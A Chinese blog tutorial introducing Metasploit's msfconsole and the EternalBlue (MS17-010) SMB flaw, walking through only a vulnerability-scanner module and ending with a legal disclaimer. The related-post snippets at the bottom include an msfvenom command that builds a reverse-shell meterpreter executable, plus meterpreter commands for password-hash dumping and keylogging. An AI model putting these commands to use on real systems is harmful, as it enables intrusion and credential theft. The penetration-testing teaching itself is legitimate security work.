网络空间安全-Kali Msfconsole-永恒之蓝介绍、渗透测试、使用

原创 已于 2024-05-22 17:33:43 修改 · 1.1k 阅读 · 16 ·
CC 4.0 BY-SA版权
彪哥.TOP
文章标签:

#安全 #网络 #web安全 #算法 #开发语言 #c语言 #php

于 2024-05-22 16:31:15 首次发布

Msfconsole介绍

Kali Linux中的msfconsole(Metasploit Framework Console)是Metasploit框架的命令行界面,是一个功能强大的渗透测试和安全审计工具。msfconsole为安全研究人员和渗透测试人员提供了丰富的功能和资源,帮助他们发现和利用网络系统中的安全漏洞。

msfconsole集成了大量的漏洞利用模块和木马生成工具,可以方便地执行各种渗透测试任务。通过msfconsole,用户可以搜索特定的漏洞信息,选择并配置相应的漏洞利用模块,然后执行漏洞扫描或利用操作。此外,msfconsole还支持自定义脚本和插件的扩展,可以根据需要进行定制化的渗透测试任务。

在msfconsole中,用户可以使用各种命令来执行不同的操作。例如,使用“search”命令可以搜索特定的漏洞信息;使用“use”命令可以选择并加载一个漏洞利用模块;使用“show options”命令可以显示已选漏洞利用模块的配置选项;使用“set”命令可以设置特定的配置选项;最后,使用“exploit”或“run”命令可以执行漏洞扫描或利用操作。

永恒之蓝介绍

永恒之蓝(EternalBlue)漏洞爆发于2017年4月14日晚,是一种利用Windows系统的SMB(Server Message Block)协议漏洞来获取系统最高权限,从而控制被入侵的计算机的安全威胁。以下是关于永恒之蓝漏洞的详细介绍:

  1. 漏洞原理:永恒之蓝漏洞通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。只要用户主机开机联网,攻击者即可通过该漏洞控制用户的主机。
  2. 影响版本:目前已知受影响的Windows版本包括但不限于:Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8、Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
  3. 衍生威胁:在2017年5月12日,不法分子通过改造“永恒之蓝”制作了WannaCry勒索病毒,使全世界大范围内遭受了该勒索病毒的攻击,甚至波及到学校、大型企业、政府等机构。该病毒通过加密用户的文件,要求支付高额的赎金才能恢复文件。不过,在该病毒出来不久就被微软通过打补丁修复了。

Msfconsole模拟渗透测试永恒之蓝

  1. 启动Metasploit Framework

     

    打开Kali Linux终端,并输入以下命令启动msfconsole:

    msfconsole

  2. 搜索永恒之蓝相关模块

     

    在msfconsole中,使用search命令搜索与永恒之蓝相关的模块。请注意,Metasploit的模块库可能会更新,所以具体的模块名称可能会有所不同。

    search eternalblue

  3. 选择一个模拟或测试模块

     

    假设我们有一个名为auxiliary/scanner/smb/smb_ms17_010的模块,它是用来检测目标是否易受永恒之蓝漏洞影响的。我们不会选择漏洞利用模块,因为那是非法的。

    use auxiliary/scanner/smb/smb_ms17_010

  4. 查看并设置模块选项

     

    使用show options命令查看模块的配置选项,并设置目标IP地址。

    show options 
set RHOSTS <target_ip>
    将<target_ip>替换为你要测试的目标IP地址。

  5. 运行模块

     

    使用runexploit命令来运行模块。

    run
    如果目标易受攻击,该模块将返回相关信息。但请注意,这只是一个检测模块,不会真正利用漏洞。

    声明

  • 法律和道德责任:始终确保你有权对目标进行渗透测试,并已获得目标所有者的明确许可。未经授权的攻击是违法的,并可能导致严重的后果。
  • 保护数据:在处理任何形式的网络测试时,始终尊重数据的隐私和安全。不要泄露或滥用任何敏感信息。
  • 更新和修补:确保你的Kali Linux系统和Metasploit Framework都是最新的,以便利用最新的安全功能和漏洞修复。
  • 使用教育目的:本指南仅用于教育和学习目的。不要将其用于非法活动。

网络安全工具系列:网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
weixin_54626591的博客
08-05 388
网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
msfconsole——通过ms17-010 EternalBlue永恒之蓝 渗透WinServer2008
Ho1aAs‘s Blog
07-28 2137
文章目录一、使用环境二、渗透之前三、渗透测试Ⅰ、配置msfconsoleⅡ、设置载荷Ⅲ、开始渗透常用meterpreter命令Ⅳ、用户提权Ⅴ、远程连接完 免责声明:本文章仅供学习、交流使用 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 Windows Server 2008 R2 Enterprise ms17-010 EternalBlue 二、渗透之前 请配置好虚拟机系统并开机 确保两套虚拟机处于同一局域网下,请统一使用桥接模式或NAT模式 通过命令台分别查询虚
Metasploit(MSF)渗透测试永恒之蓝实验
最新发布
weixin_36919275的博客
06-08 152
meterpreter中不仅有基本命令还有很多扩展库,下面就介绍一下常用的扩展库的查看方法。
kalimsfconsole
03-19 1842
1.启动msfconsole命令模式2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe3.启动msfconsole命令模式 use exploit/multi/handler 使用han...
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 6799
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用
python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
weixin_39839410的博客
12-22 1000
1.Metaspolit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.术语渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击载荷(Payload):...
网络安全实战(三)Kali Linux渗透测试永恒之蓝 MS17-010漏洞复现)
weixin_42474227的博客
12-30 9847
永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
python调用msfconsole全自动永恒之蓝攻击_MSF框架实现“永恒之蓝”ms17-010的exp攻击...
weixin_39806779的博客
12-22 692
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。本次用到的环境:kali系统.ip地址:192.168.1.106目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102具体的步骤如下...
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1184
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
Kali msf教程
08-24
kali linux msf系列教程
Msfconsole详细教程
weixin_65582330的博客
03-05 4949
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
08-22 4420
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
Msfconsole工具使用教程
shen213254149的博客
05-25 2516
Msfconsole是Metasploit Framework的一个核心组件,这是一个广泛使用渗透测试框架。Metasploit是一个开源平台,旨在帮助安全研究人员和渗透测试人员识别、研究和利用安全漏洞。1.2漏洞利用(Exploits):Msfconsole包含了大量预构建的漏洞利用模块,这些模块可以针对已知的安全漏洞发起攻击,以测试目标系统是否存在这些漏洞。
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透
热门推荐
yeshankuangrenaaaaa的博客
12-06 1万+
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透 术语 渗透攻击(exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全 漏洞,所进行的攻击行为。 攻击载荷(payload),是我们期望目标系统在渗透攻击之后去执行的代码 shellcode,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写 模块(Module),指Metasploit框架中所使用...
msfconsole永恒之蓝的操作与应用
qq_59020256的博客
03-11 721
help #获取所有可用命令getuid #获取当前权限screenshot #截屏hashdump #获取密码的hashps #获取进程列表sysinfo #获取系统信息route #获取路由表getpid #获取当前攻入的进程pidmigrate #将当前后门注入迁移到其他程序keyscan_start # 开启键盘记录keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe。
介绍msfconsole
2401_85592408的博客
10-07 430
Meterpreter:msfconsole 经常与 Meterpreter 配合使用,Meterpreter 是一个高级的、可扩展的payload,提供了一个稳定的交互式命令行环境,用于执行后渗透任务。需要注意的是,msfconsole 应该在合法授权的情况下使用,. 漏洞扫描与利用:msfconsole 提供了多种漏洞扫描和利用模块,可以对目标系统进行漏洞扫描,并利用发现的漏洞进行渗透测试。. 数据库集成:msfconsole 可以与数据库集成,存储和检索有关目标系统的信息,如主机、服务、漏洞等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

彪哥.TOP

稀罕作者

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值